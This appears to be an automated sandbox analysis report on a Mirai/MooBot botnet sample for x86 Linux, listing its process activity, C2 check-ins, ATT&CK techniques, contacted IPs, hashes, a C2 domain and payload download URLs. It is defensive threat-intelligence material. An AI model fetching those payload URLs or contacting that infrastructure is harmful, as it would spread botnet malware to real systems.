          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/17/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/18/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1594/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/120/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/121/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1349/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/4738/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/122/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/243/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/123/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/2/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/124/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/3/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/4/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/125/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/126/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1344/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1465/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1586/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/127/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/6/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/248/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/128/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/249/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1463/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/800/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/9/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/801/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/6239/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/20/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/21/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1900/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/22/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/23/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/24/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/25/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/26/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/6256/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/27/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/6255/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/28/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/6258/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/29/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/6257/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/491/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/250/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/130/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/251/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/252/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/132/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/253/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/254/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/255/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/256/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1599/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/257/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1477/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/379/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/258/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1476/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/259/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1475/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/936/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/30/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/2208/cmdlineJump to behavior
          Source: /usr/bin/dash (PID: 6264)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.o0m9XlNOsh /tmp/tmp.FgKBN6xDj9 /tmp/tmp.8wfxIBdWbgJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 58822 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 58822
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34498 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 34498
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37318 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37318 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56142 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 37215

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: skyljne.x86.elf, type: SAMPLE
          Source: Yara matchFile source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: skyljne.x86.elf PID: 6254, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
          Source: Yara matchFile source: skyljne.x86.elf, type: SAMPLE
          Source: Yara matchFile source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: skyljne.x86.elf PID: 6254, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
          Valid Accounts1
          Scripting
          Path InterceptionPath Interception1
          Scripting
          1
          OS Credential Dumping
          System Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          File Deletion
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
          Non-Standard Port
          SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
          Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
          Non-Application Layer Protocol
          Data Encrypted for ImpactDNS ServerEmail Addresses
          Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication5
          Application Layer Protocol
          Data DestructionVirtual Private ServerEmployee Names
          Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer3
          Ingress Tool Transfer
          Data Encrypted for ImpactServerGather Victim Network Information
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1374445 Sample: skyljne.x86.elf Startdate: 14/01/2024 Architecture: LINUX Score: 100 24 haha.skyljne.click 2->24 26 41.23.191.238 VODACOM-ZA South Africa 2->26 28 99 other IPs or domains 2->28 30 Snort IDS alert for network traffic 2->30 32 Malicious sample detected (through community Yara rule) 2->32 34 Antivirus / Scanner detection for submitted sample 2->34 36 6 other signatures 2->36 8 skyljne.x86.elf 2->8         started        10 gnome-session-binary sh gsd-print-notifications 2->10         started        12 dash rm 2->12         started        signatures3 process4 process5 14 skyljne.x86.elf 8->14         started        process6 16 skyljne.x86.elf 14->16         started        18 skyljne.x86.elf 14->18         started        20 skyljne.x86.elf 14->20         started        22 skyljne.x86.elf 14->22         started       
          SourceDetectionScannerLabelLink
          skyljne.x86.elf66%ReversingLabsLinux.Trojan.LnxMirai
          skyljne.x86.elf51%VirustotalBrowse
          skyljne.x86.elf100%AviraEXP/ELF.Mirai.Gen.Z.A
          skyljne.x86.elf100%Joe Sandbox ML
          No Antivirus matches
          SourceDetectionScannerLabelLink
          haha.skyljne.click7%VirustotalBrowse
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          haha.skyljne.click
          103.245.236.152
          truetrueunknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://103.245.236.152/skyljne.mips;$skyljne.x86.elffalse
            unknown
            http://103.245.236.152/skyljne.mpsl;skyljne.x86.elffalse
              unknown
              http://schemas.xmlsoap.org/soap/encoding/skyljne.x86.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/skyljne.x86.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  41.68.176.215
                  unknownEgypt
                  24835RAYA-ASEGfalse
                  48.196.108.152
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  157.31.108.186
                  unknownUnited States
                  8968BT-ITALIAITfalse
                  67.244.212.128
                  unknownUnited States
                  11351TWC-11351-NORTHEASTUSfalse
                  169.176.36.85
                  unknownUnited States
                  37611AfrihostZAfalse
                  203.231.219.218
                  unknownKorea Republic of
                  9848SEJONGTELECOM-AS-KRSejongTelecomKRfalse
                  204.28.47.5
                  unknownUnited States
                  13325STOMIUSfalse
                  183.100.211.173
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  41.55.86.185
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  157.6.53.131
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  37.175.45.185
                  unknownFrance
                  51207FREEMFRfalse
                  197.219.238.83
                  unknownMozambique
                  37342MOVITELMZfalse
                  197.204.101.54
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  145.62.19.113
                  unknownNetherlands
                  201204GFIS-AS-DEfalse
                  94.22.161.59
                  unknownFinland
                  15527ANVIASilmukkatie6VaasaFinlandFIfalse
                  128.153.233.87
                  unknownUnited States
                  92CLARKSON-ASUSfalse
                  71.139.99.79
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  41.124.253.235
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  157.140.175.226
                  unknownUnited Kingdom
                  786JANETJiscServicesLimitedGBfalse
                  34.148.46.202
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  187.202.208.120
                  unknownMexico
                  8151UninetSAdeCVMXfalse
                  205.34.123.211
                  unknownUnited States
                  2914NTT-COMMUNICATIONS-2914USfalse
                  157.216.113.7
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  193.105.108.59
                  unknownUnited Kingdom
                  207476LV_IZSLVfalse
                  137.206.233.51
                  unknownUnited States
                  137ASGARRConsortiumGARREUfalse
                  97.188.235.74
                  unknownUnited States
                  6167CELLCO-PARTUSfalse
                  41.239.14.63
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  170.12.135.197
                  unknownUnited States
                  27283RJF-INTERNETUSfalse
                  168.226.184.119
                  unknownArgentina
                  22927TelefonicadeArgentinaARfalse
                  197.90.198.161
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  112.160.28.252
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  201.248.15.123
                  unknownVenezuela
                  8048CANTVServiciosVenezuelaVEfalse
                  223.216.154.13
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  139.199.192.60
                  unknownChina
                  45090CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompafalse
                  142.31.146.130
                  unknownCanada
                  3633PROVINCE-OF-BRITISH-COLUMBIACAfalse
                  149.69.203.135
                  unknownUnited States
                  54177ASN-SJFCUSfalse
                  36.26.247.50
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  63.26.119.249
                  unknownUnited States
                  6984NYNEX-ASUSfalse
                  167.97.21.253
                  unknownUnited States
                  2055LSU-1USfalse
                  41.23.191.238
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  53.159.207.10
                  unknownGermany
                  31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                  160.236.91.47
                  unknownunknown
                  11259ANGOLATELECOMAOfalse
                  109.174.181.145
                  unknownUnited Kingdom
                  4589EASYNETEasynetGlobalServicesEUfalse
                  196.62.191.204
                  unknownSouth Africa
                  37518FIBERGRIDSCfalse
                  131.146.46.30
                  unknownUnited States
                  3377MCI-ASNUSfalse
                  209.122.170.217
                  unknownUnited States
                  6079RCN-ASUSfalse
                  203.153.248.59
                  unknownAustralia
                  9822AMNET-AU-APAmnetITServicesPtyLtdAUfalse
                  95.125.208.110
                  unknownSpain
                  3352TELEFONICA_DE_ESPANAESfalse
                  177.157.159.13
                  unknownBrazil
                  10429TELEFONICABRASILSABRfalse
                  197.177.27.33
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEfalse
                  157.255.17.211
                  unknownChina
                  136958UNICOM-GUANGZHOU-IDCChinaUnicomGuangdongIPnetworkCNfalse
                  40.216.186.167
                  unknownUnited States
                  4249LILLY-ASUSfalse
                  187.231.15.1
                  unknownMexico
                  8151UninetSAdeCVMXfalse
                  170.15.216.183
                  unknownUnited States
                  14145REGIONS-ASN-3USfalse
                  25.80.200.154
                  unknownUnited Kingdom
                  7922COMCAST-7922USfalse
                  157.17.38.49
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  220.97.104.178
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  185.57.118.219
                  unknownIreland
                  47720CIX-ASIEfalse
                  4.167.93.11
                  unknownUnited States
                  3356LEVEL3USfalse
                  89.229.244.158
                  unknownPoland
                  21021MULTIMEDIA-ASCableDTVInternetVoiceProviderinPolandfalse
                  41.52.104.0
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  173.229.159.10
                  unknownUnited States
                  10405UPRR-ASN-01USfalse
                  197.194.23.183
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  173.77.194.75
                  unknownUnited States
                  701UUNETUSfalse
                  91.130.14.212
                  unknownAustria
                  1257TELE2EUfalse
                  124.224.95.27
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  157.118.135.170
                  unknownJapan58785TGU-NETTohokuGakuinUniversityJPfalse
                  80.199.69.233
                  unknownDenmark
                  3292TDCTDCASDKfalse
                  162.179.7.42
                  unknownUnited States
                  21928T-MOBILE-AS21928USfalse
                  126.102.240.231
                  unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                  115.164.156.228
                  unknownMalaysia
                  4818DIGIIX-APDiGiTelecommunicationsSdnBhdMYfalse
                  164.42.135.77
                  unknownPuerto Rico
                  16649IUPR-ASPRfalse
                  150.98.213.178
                  unknownJapan2516KDDIKDDICORPORATIONJPfalse
                  80.104.28.110
                  unknownItaly
                  3269ASN-IBSNAZITfalse
                  41.217.104.41
                  unknownNigeria
                  37340SpectranetNGfalse
                  31.218.10.40
                  unknownUnited Arab Emirates
                  5384EMIRATES-INTERNETEmiratesInternetAEfalse
                  197.180.107.47
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEfalse
                  89.146.240.81
                  unknownGermany
                  8495INTERNET_AGFrankfurt-Munich-Stuttgart-Amsterdam-LondonDEfalse
                  41.95.229.240
                  unknownSudan
                  36998SDN-MOBITELSDfalse
                  157.21.202.252
                  unknownUnited States
                  53446EVMSUSfalse
                  183.38.52.157
                  unknownChina
                  4816CHINANET-IDC-GDChinaTelecomGroupCNfalse
                  99.16.4.75
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  85.193.76.74
                  unknownRussian Federation
                  209231CCNLfalse
                  129.181.212.55
                  unknownFrance
                  3320DTAGInternetserviceprovideroperationsDEfalse
                  49.238.73.11
                  unknownKorea Republic of
                  9614OCTOitaCableTelecomColtdJPfalse
                  18.64.50.216
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  48.239.71.35
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  197.220.141.56
                  unknownLesotho
                  33567TELECOM-LESOTHOLSfalse
                  57.49.207.75
                  unknownBelgium
                  2686ATGS-MMD-ASUSfalse
                  157.91.133.230
                  unknownUnited States
                  1767ILIGHT-NETUSfalse
                  53.187.111.121
                  unknownGermany
                  31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                  23.30.255.229
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  140.23.194.120
                  unknownUnited States
                  23700FASTNET-AS-IDLinknet-FastnetASNIDfalse
                  223.59.156.223
                  unknownKorea Republic of
                  9644SKTELECOM-NET-ASSKTelecomKRfalse
                  113.65.219.150
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  122.191.225.23
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  142.67.150.42
                  unknownCanada
                  22636NOVA-SCOTIA-POWERCAfalse
                  157.146.139.18
                  unknownUnited States
                  719ELISA-ASHelsinkiFinlandEUfalse
                  157.233.0.209
                  unknownUnited States
                  20001TWC-20001-PACWESTUSfalse
                  83.98.57.179
                  unknownUnited Kingdom
                  30914IOKO-ASGBfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  41.68.176.215bk.arm7-20221002-0650.elfGet hashmaliciousMiraiBrowse
                    bk.mips-20220929-2309.elfGet hashmaliciousMiraiBrowse
                      F5ESSB0UhUGet hashmaliciousMiraiBrowse
                        157.6.53.131V6oNf5gWbn.elfGet hashmaliciousMirai, MoobotBrowse
                          EQJdIohAiVGet hashmaliciousMiraiBrowse
                            Tsunami.x86Get hashmaliciousMiraiBrowse
                              169.176.36.85SecuriteInfo.com.Linux.Siggen.9999.27800.2704.elfGet hashmaliciousMiraiBrowse
                                204.28.47.5IIw6S9lWlX.elfGet hashmaliciousMiraiBrowse
                                  kRy0R9mhYXGet hashmaliciousMiraiBrowse
                                    41.55.86.185skyljne.arm7-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                      GH53M1dXgO.elfGet hashmaliciousMirai, MoobotBrowse
                                        o1KfdLbqvL.elfGet hashmaliciousMirai, MoobotBrowse
                                          F1HfLHQS3AGet hashmaliciousUnknownBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            haha.skyljne.clickskyljne.arm5.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.152
                                            skyljne.x86_64.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.152
                                            skyljne.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.152
                                            skyljne.x86_64-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.mips-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.arm5-20240113-1759.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.x86-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.arm-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.mpsl-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.arm7-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            Yy6UdBIY7T.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            godTavyAZD.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            zogsXPGVgB.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.arm5.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.arm.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.x86.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.mips.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            skyljne.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 103.245.236.188
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            RAYA-ASEGskyljne.mips-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 197.134.36.202
                                            skyljne.arm5.elfGet hashmaliciousMiraiBrowse
                                            • 41.69.118.201
                                            skyljne.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 41.68.176.213
                                            OriginalMessage.txt.msgGet hashmaliciousHTMLPhisherBrowse
                                            • 23.219.13.47
                                            skyljne.mips.elfGet hashmaliciousMiraiBrowse
                                            • 41.70.6.175
                                            skyljne.x86-20240109-1651.elfGet hashmaliciousMiraiBrowse
                                            • 197.132.217.137
                                            skyljne.x86_64-20240109-1651.elfGet hashmaliciousMiraiBrowse
                                            • 41.69.75.143
                                            x86.elfGet hashmaliciousMiraiBrowse
                                            • 41.69.27.219
                                            nfulha516h.elfGet hashmaliciousMiraiBrowse
                                            • 41.69.27.242
                                            tdeICWuzbr.elfGet hashmaliciousMiraiBrowse
                                            • 41.68.96.110
                                            4oNNEt4r0K.elfGet hashmaliciousMiraiBrowse
                                            • 41.68.96.161
                                            MeJonNJG8q.elfGet hashmaliciousMiraiBrowse
                                            • 41.69.166.108
                                            skyljne.x86.elfGet hashmaliciousMiraiBrowse
                                            • 41.69.75.153
                                            skyljne.x86_64.elfGet hashmaliciousMiraiBrowse
                                            • 197.132.175.97
                                            L2IuyoaB0y.elfGet hashmaliciousMiraiBrowse
                                            • 41.68.96.137
                                            2j5zwxO3H7.elfGet hashmaliciousMiraiBrowse
                                            • 41.68.176.213
                                            https://ow.ly/VN8S50QnOusGet hashmaliciousUnknownBrowse
                                            • 23.218.232.149
                                            YlLXXWjwHD.elfGet hashmaliciousMiraiBrowse
                                            • 197.133.231.234
                                            arm7.elfGet hashmaliciousMiraiBrowse
                                            • 197.133.231.228
                                            ATGS-MMD-ASUSskyljne.x86_64.elfGet hashmaliciousMiraiBrowse
                                            • 32.243.224.229
                                            skyljne.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 48.14.246.26
                                            where_are_billing_agreements_in_paypal_23827.jsGet hashmaliciousUnknownBrowse
                                            • 34.149.157.193
                                            G11za2w6Na.elfGet hashmaliciousMiraiBrowse
                                            • 57.237.12.130
                                            6HKlYaVUOY.elfGet hashmaliciousMiraiBrowse
                                            • 32.38.240.119
                                            oawyuZdHQO.elfGet hashmaliciousMiraiBrowse
                                            • 57.147.18.14
                                            eda1b61399b5eb51c1d39c093cc39f4587c59751ac8eab6fc8d57d2f58d7229f_dump.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 34.128.82.12
                                            http://www.protinemex.comGet hashmaliciousUnknownBrowse
                                            • 34.146.51.250
                                            skyljne.x86_64-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 51.115.7.207
                                            skyljne.mips-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 32.129.160.251
                                            skyljne.arm5-20240113-1759.elfGet hashmaliciousMiraiBrowse
                                            • 48.169.132.38
                                            skyljne.arm-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 57.211.91.8
                                            skyljne.mpsl-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 57.204.8.73
                                            skyljne.arm7-20240113-1800.elfGet hashmaliciousMiraiBrowse
                                            • 34.45.62.9
                                            https://awrs.cl/wp-content/themes/form/bill.charged.htmlGet hashmaliciousUnknownBrowse
                                            • 34.135.80.45
                                            http://vvjaypackers.co.inGet hashmaliciousUnknownBrowse
                                            • 34.160.37.234
                                            ISO Certificate_pdf.htmlGet hashmaliciousUnknownBrowse
                                            • 34.160.144.191
                                            Yy6UdBIY7T.elfGet hashmaliciousMiraiBrowse
                                            • 51.234.183.232
                                            godTavyAZD.elfGet hashmaliciousMiraiBrowse
                                            • 51.205.131.117
                                            skyljne.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 51.115.7.223
                                            No context
                                            No context
                                            No created / dropped files found
                                            File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                            Entropy (8bit):5.840521369706214
                                            TrID:
                                            • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                            • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                            File name:skyljne.x86.elf
                                            File size:103'080 bytes
                                            MD5:2357668b7c737cf603987f04c89b61b2
                                            SHA1:53cba284d060b97b7db31be433d238fd715f72a3
                                            SHA256:b0afcbfd840a393d2e7f4d630986ebc74cdce549aac0cca687e35296cec62ee3
                                            SHA512:3fb4970452b3572439f5dd3b7b5a5701ace7547b3c8a6435015de49cf1dab02ce9f9d82f6e90da69d34597f7780dfc385d330615419bdb6512566de7b0db017a
                                            SSDEEP:3072:0S1GIt7wDRKt2+YrhVJtcbbO/njYoYMV:0oBcDRjk2nrrV
                                            TLSH:ECA37CC0F783D5F5E84305B5607BEB338B32E4B9212AEA42D3B95D32AC51451DA1BB9C
                                            File Content Preview:.ELF....................d...4...........4. ...(.....................PI..PI..............TI..T...T....G..............Q.td............................U..S........X...h..... ..[]...$.............U......=. ...t..5...................u........t....hP...........

                                            ELF header

                                            Class:ELF32
                                            Data:2's complement, little endian
                                            Version:1 (current)
